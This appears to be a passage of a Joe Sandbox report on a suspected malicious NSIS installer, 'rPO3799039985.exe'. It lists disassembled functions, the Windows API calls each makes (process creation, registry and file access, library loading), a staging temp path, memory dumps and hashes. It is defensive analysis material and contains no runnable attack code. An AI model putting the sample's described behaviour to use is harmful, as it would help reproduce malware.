                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\rPO3799039985.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                          • API String ID: 1716503409-1120060315
                                                                                                                                                                                                          • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                                                                                                          • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98
                                                                                                                                                                                                          Function 0040588F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 674 40588f-4058aa call 405d2f call 40583a 679 4058b0-4058bd call 405f9a 674->679 680 4058ac-4058ae 674->680 684 4058c9-4058cb 679->684 685 4058bf-4058c3 679->685 682 405902-405904 680->682 687 4058e1-4058ea lstrlenA 684->687 685->680 686 4058c5-4058c7 685->686 686->680 686->684 688 4058ec-405900 call 4057a1 GetFileAttributesA 687->688 689 4058cd-4058d4 call 406033 687->689 688->682 694 4058d6-4058d9 689->694 695 4058db-4058dc call 4057e8 689->695 694->680 694->695 695->687
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Snik Setup,NSIS Error), ref: 00405D3C
                                                                                                                                                                                                            • Part of subcall function 0040583A: CharNextA.USER32(?,?,C:\,?,004058A6,C:\,C:\,75083410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                                                                                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                                                                                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                                                                                                                          • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,75083410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,75083410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75083410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                          • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 3248276644-2214159804
                                                                                                                                                                                                          • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                                                                                                                          • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
                                                                                                                                                                                                          Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 697 4015b3-4015c6 call 402a3a call 40583a 702 4015c8-4015db call 4057cc 697->702 703 40161c-40161f 697->703 710 4015f3-4015f4 call 40548b 702->710 711 4015dd-4015e0 702->711 705 401621-40163c call 401423 call 405d2f SetCurrentDirectoryA 703->705 706 40164a-4021c9 call 401423 703->706 720 4028cf-4028de 705->720 723 401642-401645 705->723 706->720 721 4015f9-4015fb 710->721 711->710 714 4015e2-4015e9 call 4054a8 711->714 714->710 727 4015eb-4015f1 call 40540e 714->727 724 401612-40161a 721->724 725 4015fd-401602 721->725 723->720 724->702 724->703 728 401604-40160d GetFileAttributesA 725->728 729 40160f 725->729 727->721 728->724 728->729 729->724
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040583A: CharNextA.USER32(?,?,C:\,?,004058A6,C:\,C:\,75083410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                                                                                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                                                                                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                                                                                                            • Part of subcall function 0040540E: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen,00000000,00000000,000000F0), ref: 00401634
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen, xrefs: 00401629
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen
                                                                                                                                                                                                          • API String ID: 1892508949-468232566
                                                                                                                                                                                                          • Opcode ID: c48e80625146c734819094399e099f0f26d2d720ad305fd1441f6452ebd5e2f9
                                                                                                                                                                                                          • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c48e80625146c734819094399e099f0f26d2d720ad305fd1441f6452ebd5e2f9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                                                                                                                                                                          Function 004054C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 733 4054c0-4054f1 CreateProcessA 734 4054f3-4054fc CloseHandle 733->734 735 4054ff-405500 733->735 734->735
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Error launching installer, xrefs: 004054D3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                          • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                                                                                                                                          • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                                                                                                                                                                          Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                                                                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                                                                                                            • Part of subcall function 00404F48: lstrcatA.KERNEL32(Completed,00402FFA,00402FFA,Completed,00000000,0041C1AE,750823A0), ref: 00404FA4
                                                                                                                                                                                                            • Part of subcall function 00404F48: SetWindowTextA.USER32(Completed,Completed), ref: 00404FB6
                                                                                                                                                                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                                                                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                                                                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                                                                                                            • Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                                                                                                                                            • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3521207402-0
                                                                                                                                                                                                          • Opcode ID: d8b5dce07ba6ac1784379787cb29f6b1de53264d6e7b4441dd29526f16ac5c4c
                                                                                                                                                                                                          • Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8b5dce07ba6ac1784379787cb29f6b1de53264d6e7b4441dd29526f16ac5c4c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
                                                                                                                                                                                                          Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                                                                                                                                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Enum$CloseOpenValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 167947723-0
                                                                                                                                                                                                          • Opcode ID: 2e1c7d330be965f569518e561c755f509e7644e2f76c499267a2e8e8767b0554
                                                                                                                                                                                                          • Instruction ID: 651eecc7003a3be3ddeb342969b55079318d5f4ee149c111f32be82b22242bac
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e1c7d330be965f569518e561c755f509e7644e2f76c499267a2e8e8767b0554
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FF0AD72A04200AFEB11AF659E88EBB7A6DEB40344B10443AF505A61C0D6B849459A7A
                                                                                                                                                                                                          Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                          • Opcode ID: 9cf958dc8020beb2586e3c6158c9201faa194e5bb54263b31fc6b527f116e62c
                                                                                                                                                                                                          • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cf958dc8020beb2586e3c6158c9201faa194e5bb54263b31fc6b527f116e62c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                                                                                                                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                          • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                                                                                                                          • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                                                                                                                                                          Function 0040501A Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040502A
                                                                                                                                                                                                            • Part of subcall function 00403F60: SendMessageA.USER32(000103DC,00000000,00000000,00000000), ref: 00403F72
                                                                                                                                                                                                          • CoUninitialize.COMBASE(00000404,00000000), ref: 00405076
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2896919175-0
                                                                                                                                                                                                          • Opcode ID: 24ebda43c93c3a0e79a2719f9d73c458f4bc0a47607411017357536a7f3aecb3
                                                                                                                                                                                                          • Instruction ID: 3bb1638c4cb192e16dfd02cc67da28ccb22f822f40d61e8a5dd6919248452ec0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24ebda43c93c3a0e79a2719f9d73c458f4bc0a47607411017357536a7f3aecb3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79F02473A041018BE3616B259C00B5B77A0EB88301F14003AFE44732E1DA3A59028AAE
                                                                                                                                                                                                          Function 004060C8 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                                                                                                                            • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                                                                                                                                            • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                                                                                                                                                            • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                                          • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                                                                                                                          • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                                                                                                                                                          Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\rPO3799039985.exe,80000000,00000003), ref: 004059A6
                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
